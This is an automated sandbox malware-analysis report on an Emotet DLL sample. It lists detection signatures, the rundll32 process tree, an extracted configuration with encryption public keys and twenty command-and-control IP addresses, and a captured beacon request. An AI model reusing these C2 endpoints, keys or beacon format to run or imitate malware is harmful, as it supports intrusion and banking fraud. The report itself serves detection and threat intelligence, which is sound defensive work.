Play interactive tour

Edit tour

Windows Analysis Report yFAXc9z51V

Overview

General Information

Sample Name:	yFAXc9z51V (renamed file extension from none to dll)
Analysis ID:	524857
MD5:	fee9ba8d79bcbc58800fda0cafbe5f64
SHA1:	82eb29987e6ed568a5ae01816de7240df1490c0d
SHA256:	3e8acc4d85b6ffc06b18b97a33a43628e8c11bc4dde8648bcc8a2ad9b1154150
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Changes security center settings (notifications, updates, antivirus, firewall)

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

svchost.exe (PID: 3604 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

loaddll32.exe (PID: 924 cmdline: loaddll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6648 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5564 cmdline: rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2336 cmdline: rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr",vQmrKt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Wlimfwutowthen\gdntcqg.ebr",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2528 cmdline: rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 160 cmdline: rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6656 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6108 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6236 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6896 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 4036 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6428 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5496 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 4332 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.388952908.000000000295A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.414340731.00000000033AA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.390623075.00000000028BA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.363481536.0000000002AFA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.390502900.000000000097D000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.365418732.0000000002ABA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000013.00000002.808384988.00000000026E7000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.2b14358.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.28d41f8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2ad5298.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2974250.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.2b14358.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.28d41f8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.33c6390.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2974250.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2ad5298.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.33c6390.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5564, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL, ProcessId: 6904

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 12.2.rundll32.exe.33c6390.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: yFAXc9z51V.dll	Virustotal: Detection: 24%			Perma Link
Source: yFAXc9z51V.dll	ReversingLabs: Detection: 22%

Source: yFAXc9z51V.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.3:49748 version: TLS 1.2

Source: yFAXc9z51V.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 19_2_04051A80 FindFirstFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49748 -> 51.178.61.60:443

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /RUMPKfyWvwh HTTP/1.1Cookie: gVql=qP2SWVnr/WJG8YP5xSF8G7Rr6KkEKH5oVbT/aPyZcyn9K/saApq06qYJQ7VQDqAGQmsog3CqnGHN9x0QykU5uuVnobYs31akiF1WnncdqfGM3pGgWKZ2r4ogC9SE6Vh2+mnqzNK2/WuhSLvfpxzgrn3BeUCBI3LUqJXa1TfC4xBhYwdQa/6a5jixa5pMiqaToa/047TTwtpTt5xgOLwssCVW5YzKACeEqQfp8YgGPHadd14J0SJTGVNqyFCbrXXoDBPSb3GwjcRynh1BJ5z3u6jM5aWKTd6XgU1rwPi8sKMzrSyB1Zu0v5YluHWstRSulPtNogkEJBlOu+qxuLWX18w=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60

Source: svchost.exe, 0000001F.00000002.574460997.000001D780700000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001F.00000002.574914431.000001D7FFEEA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000A.00000002.387177184.00000227B4E13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000002.00000002.807596478.000001BFDBA2A000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000002.00000002.807596478.000001BFDBA2A000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.387371903.00000227B4E65000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.381842059.00000227B4E45000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000002.387218304.00000227B4E29000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.381810222.00000227B4E41000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
Source: svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000002.387371903.00000227B4E65000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.381806871.00000227B4E56000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.387288308.00000227B4E40000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000003.381842059.00000227B4E45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001F.00000003.555460068.000001D7807A8000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.555448598.000001D780787000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 19_2_04061027 InternetReadFile,

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.3:49748 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA75EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode,

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2b14358.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.28d41f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2ad5298.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2974250.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2b14358.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.28d41f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.33c6390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2974250.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2ad5298.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.33c6390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.388952908.000000000295A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.414340731.00000000033AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.390623075.00000000028BA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.363481536.0000000002AFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.390502900.000000000097D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.365418732.0000000002ABA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.808384988.00000000026E7000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: yFAXc9z51V.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Wlimfwutowthen\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6CAA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C5441E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C643B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6BEC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6CCD4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C708D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C67ED1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C60ADE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6ECE3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6AEEB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6DEF4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C530F6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C70687
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C57283
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C5CC8D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C64E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6748A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C5AC95
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C53C91
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6D091
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6AC9B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6D6A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C678A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C5FEA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C644AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C55AB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C698BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C690BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C53845
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C52A46
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C52043
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6E441
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C5A048
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C52654
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C59A57
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6406E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C51C76
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C54C00
